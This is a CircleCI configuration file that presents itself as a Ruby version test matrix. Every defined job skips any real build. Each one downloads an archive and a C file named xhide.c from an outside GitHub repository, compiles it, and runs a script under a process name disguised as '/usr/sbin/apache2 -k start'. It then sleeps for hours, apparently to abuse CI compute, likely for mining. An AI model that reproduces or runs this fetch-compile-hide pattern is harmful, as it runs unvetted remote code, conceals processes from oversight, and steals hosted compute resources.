# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.0

jobs:
  "rubi-2.2":
    docker:
      - image: circleci/ruby:2.2-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          

  "rubi-2.3":
    docker:
      - image: circleci/ruby:2.3-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          
  "rubi-2.3.1":
    docker:
      - image: circleci/ruby:2.3.1-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
  
  "rubi-2.3.2":
    docker:
      - image: circleci/ruby:2.3.2-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m       
          
  "rubi-2.3.3":
    docker:
      - image: circleci/ruby:2.3.3-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m

  "rubi-2.3.4":
    docker:
      - image: circleci/ruby:2.3.4-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m

  "rubi-2.3.5":
    docker:
      - image: circleci/ruby:2.3.5-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m

  "rubi-2.3.6":
    docker:
      - image: circleci/ruby:2.3.6-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m

  "rubi-2.3.7":
    docker:
      - image: circleci/ruby:2.3.7-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m     

  "rubi-2.3.8":
    docker:
      - image: circleci/ruby:2.3.8-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          
  "rubi-2.3.9":
    docker:
      - image: circleci/ruby:2.3.9-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m        
          
  "rubi-2.4":
    docker:
      - image: circleci/ruby:2.4-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m        
          
  "rubi-2.4.1":
    docker:
      - image: circleci/ruby:2.4.1-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m        
          
  "rubi-2.4.2":
    docker:
      - image: circleci/ruby:2.4.2-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m        
          
  "rubi-2.4.3":
    docker:
      - image: circleci/ruby:2.4.3-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m        
          
  "rubi-2.4.4":
    docker:
      - image: circleci/ruby:2.4.4-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m 

  "rubi-2.4.5":
    docker:
      - image: circleci/ruby:2.4.5-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          
          
  "rubi-2.4.6":
    docker:
      - image: circleci/ruby:2.4.6-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          
  "rubi-2.4.7":
    docker:
      - image: circleci/ruby:2.4.7-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
      - run:
          command: sleep 18000
          no_output_timeout: 300m 
          
  "rubi-2.4.9":
    docker:
      - image: circleci/ruby:2.4.9-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          
  "rubi-2.5":
    docker:
      - image: circleci/ruby:2.5-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          
  "rubi-2.5.1":
    docker:
      - image: circleci/ruby:2.5.1-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          
  "rubi-2.5.2":
    docker:
      - image: circleci/ruby:2.5.2-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m        
          
  "rubi-2.5.3":
    docker:
      - image: circleci/ruby:2.5.3-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          
  "rubi-2.5.4":
    docker:
      - image: circleci/ruby:2.5.4-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          
  "rubi-2.5.5":
    docker:
      - image: circleci/ruby:2.5.5-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m

  "rubi-2.5.6":
    docker:
      - image: circleci/ruby:2.5.6-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          
  "rubi-2.5.7":
    docker:
      - image: circleci/ruby:2.5.7-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          
  "rubi-2.5.8":
    docker:
      - image: circleci/ruby:2.5.8-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run:  wget https://github.com/waefd46/weimu/raw/main/main.tar.gz 
      - run: tar xf main.tar.gz 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c 
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
       
      - run:
          command: sleep 18000
          no_output_timeout: 300m
          
          
workflows:
  version: 2
  build:
    jobs:
      - "rubi-2.2"
      - "rubi-2.3"
      - "rubi-2.3.1"
      - "rubi-2.3.2"
      - "rubi-2.3.3"
      - "rubi-2.3.4"
      - "rubi-2.3.5"
      - "rubi-2.3.6"
      - "rubi-2.3.7"          
      - "rubi-2.3.8"
      - "rubi-2.3.9"
      - "rubi-2.4"
      - "rubi-2.4.1"
      - "rubi-2.4.2"
      - "rubi-2.4.3"
      - "rubi-2.4.4"
      - "rubi-2.4.5"
      - "rubi-2.4.6"
      - "rubi-2.4.7"          
      - "rubi-2.4.8"
      - "rubi-2.4.9"
      - "rubi-2.5"
      - "rubi-2.5.1"
      - "rubi-2.5.2"
      - "rubi-2.5.3"
      - "rubi-2.5.4"
      - "rubi-2.5.5"
      - "rubi-2.5.6"
      - "rubi-2.5.7"          
      - "rubi-2.5.8"